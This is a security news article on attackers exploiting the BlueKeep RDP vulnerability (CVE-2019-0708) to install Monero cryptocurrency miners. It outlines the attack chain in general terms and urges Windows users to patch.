BlueKeep exploits without leaving apparent traces urging Windows users to patch now.
Security researcher Kevin Beaumont observed that the BlueKeep honeypot was crashed and later confirmed by Microsoft security researcher Beaumont as well as Marcus Hutchins that they were caused by a BlueKeep exploit module to deliver a Monero Miner.
What is BlueKeep vulnerability?
The vulnerability was named BlueKeep by computer security expert Kevin Beaumont on Twitter. Blukeep tracked as CVE-2019-0708 is a ‘wormable’ remote code execution which means it has the potential to spread in a worm-like fashion and self-replicate without requiring any user interaction. BlueKeep is a vulnerability in the Remote Desktop Protocol (RDP) that can affect the Windows Vista, Windows 7, Windows XP, Server 2003 and Server 2008 operating systems.
The vulnerability has not surfaced in the form of a worm instead the attackers scanned the internet for vulnerable systems to exploit and attacked each unpatched system, one at a time, deploying a BlueKeep exploit and then the cryptocurrency miners.
The Microsoft had deployed behavioural detection in Microsoft Defender ATP for the BlueKeep Metasploit module concerned back in early September.
- Behavioural detection for the BlueKeep Metasploit module was recognised in early September.
- The analysis showed an increase in Remote Desktop Service (RDP) service crashes from 10 to 100 every day.
- On October 9, 2019, a similar increase in memory corruption crashes was noted.
- On October 23, 2019, crashes on external researcher honeypots started.
“Microsoft security researchers found that an earlier coin mining campaign in September used the main implant that contacted the same command-and-control infrastructure used during the October BlueKeep Metasploit campaign, which in cases where the exploit did not cause the system to crash was also observed installing a coin-miner.” the report stated.
- They initiate the attack as port scans for the machines with vulnerable internet-facing RDP services.
- As soon as the attackers find such machines, they used the BlueKeep metasploit module to run a PowerShell script.
- The script gets downloaded and launches several other encoded PowerShell scripts.
- Apart from downloading the final script also created a task to ensure the coin miner stayed persist.
There is always the possibility that the threat actors behind this attack could play more malicious payloads than a crypto-miner.
Around 700,000 users vulnerable system remains unpatched. BlueKeep will be a threat until the systems remain unpatched, credential hygiene is not achieved and tools used by the threat. Customers are encouraged to identify and update vulnerable systems immediately.
You may be interested in reading: Click2Mail Suffers Data Breach